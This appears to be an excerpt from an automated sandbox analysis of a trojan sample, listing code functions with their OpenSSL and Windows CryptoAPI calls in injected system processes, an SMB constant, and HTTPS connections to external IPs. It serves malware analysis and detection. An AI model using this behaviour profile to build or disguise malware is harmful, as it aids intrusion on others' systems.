    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E40130 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E40130
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E80130 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E80130
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54120 CRYPTO_set_ex_data,49_2_00007FF8B7E54120
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E78120 CRYPTO_free,49_2_00007FF8B7E78120
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,49_2_00007FF8B7E8F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA10E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA10E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E650D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,49_2_00007FF8B7E650D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,49_2_00007FF8B7E3B0B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB1090
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E45070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E45070
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E45050 CRYPTO_set_ex_data,49_2_00007FF8B7E45050
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E9B040
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E55040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E55040
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E83040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,49_2_00007FF8B7E83040
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E31030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,49_2_00007FF8B7E31030
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E3D010
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E51000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E51000
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7CFF0 CRYPTO_realloc,49_2_00007FF8B7E7CFF0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9AFE0 CRYPTO_free,49_2_00007FF8B7E9AFE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EB8FD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E36FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,49_2_00007FF8B7E36FC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E92FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7E92FA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,49_2_00007FF8B7E9EFA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA6F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA6F60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,49_2_00007FF8B7E82F60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,49_2_00007FF8B7E82F00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E50EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E50EF0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8EED0 CRYPTO_malloc,CRYPTO_free,49_2_00007FF8B7E8EED0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E5CED0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E34E80 CRYPTO_free,49_2_00007FF8B7E34E80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E8EDD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4CDC0 CRYPTO_malloc,CRYPTO_clear_free,49_2_00007FF8B7E4CDC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3EDB0 CRYPTO_THREAD_run_once,49_2_00007FF8B7E3EDB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,49_2_00007FF8B7E82DB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB0D80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E64D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,49_2_00007FF8B7E64D30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E5CD10
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E8ED00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,49_2_00007FF8B7E3ECD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA4CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA4CC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,49_2_00007FF8B7E54CB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E98CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,49_2_00007FF8B7E98CA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBCC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EBCC60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E32C60 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E32C60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E38C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,49_2_00007FF8B7E38C60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,49_2_00007FF8B7E7AC50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E4ABF0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E66BB0 CRYPTO_malloc,49_2_00007FF8B7E66BB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,49_2_00007FF8B7E82BA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E98B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,49_2_00007FF8B7E98B90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA8B90 CRYPTO_free,CRYPTO_memdup,49_2_00007FF8B7EA8B90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,49_2_00007FF8B7E3AB80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E5CB80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7AB80 CRYPTO_free,49_2_00007FF8B7E7AB80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,49_2_00007FF8B7E3CB70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,49_2_00007FF8B7E9CB30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7EB0B30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E66B30 CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E66B30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8EB20 CRYPTO_free,49_2_00007FF8B7E8EB20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA0B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,49_2_00007FF8B7EA0B20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB0AD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4AAD0 CRYPTO_set_ex_data,49_2_00007FF8B7E4AAD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,49_2_00007FF8B7E3CAB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E46A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,49_2_00007FF8B7E46A90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E32A80 CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E32A80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8AA70 CRYPTO_realloc,49_2_00007FF8B7E8AA70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E44A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E44A72
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E96A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7E96A60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E64A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,49_2_00007FF8B7E64A60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA6A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA6A30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E54A20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E449F0 CRYPTO_memdup,CRYPTO_free,49_2_00007FF8B7E449F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,49_2_00007FF8B7EB69E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA49C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EA49C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,49_2_00007FF8B7E4E9C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E5C9A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,49_2_00007FF8B7E7E960
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8A940 CRYPTO_zalloc,49_2_00007FF8B7E8A940
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E32940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,49_2_00007FF8B7E32940
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA2930 CRYPTO_realloc,49_2_00007FF8B7EA2930
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,49_2_00007FF8B7E7A910
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81204A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,49_2_00007FF8B81204A6
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D2B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,49_2_00007FF8B80D2B80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8122CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,49_2_00007FF8B8122CC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B811FF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,49_2_00007FF8B811FF30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81231F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,49_2_00007FF8B81231F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81074E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,49_2_00007FF8B81074E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8107560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,49_2_00007FF8B8107560
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81075F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,49_2_00007FF8B81075F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80F16F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,49_2_00007FF8B80F16F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80F1820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,49_2_00007FF8B80F1820
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81228A0 CertGetNameStringW,malloc,CertFindExtension,CryptDecodeObjectEx,free,free,CertFreeCertificateContext,49_2_00007FF8B81228A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80F18B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,49_2_00007FF8B80F18B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80F18A0 CryptHashData,49_2_00007FF8B80F18A0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D2B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,55_2_00007FF8B80D2B80
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8122CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,55_2_00007FF8B8122CC0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B811FF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,55_2_00007FF8B811FF30
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81231F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,55_2_00007FF8B81231F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81204A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,55_2_00007FF8B81204A6
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81074E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,55_2_00007FF8B81074E0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8107560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,55_2_00007FF8B8107560
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81075F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,55_2_00007FF8B81075F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80F16F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,55_2_00007FF8B80F16F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80F1820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,55_2_00007FF8B80F1820
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81228A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,55_2_00007FF8B81228A0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80F18B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,55_2_00007FF8B80F18B0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80F18A0 CryptHashData,55_2_00007FF8B80F18A0
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_263df406-d
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: mov dword ptr [rbp+04h], 424D53FFh5_2_00007FF8B7EA8DE0
    Source: C:\Windows\System32\svchost.exeCode function: mov dword ptr [rbp+04h], 424D53FFh49_2_00007FF8B8108DE0
    Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh55_2_00007FF8B8108DE0
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49720 version: TLS 1.2
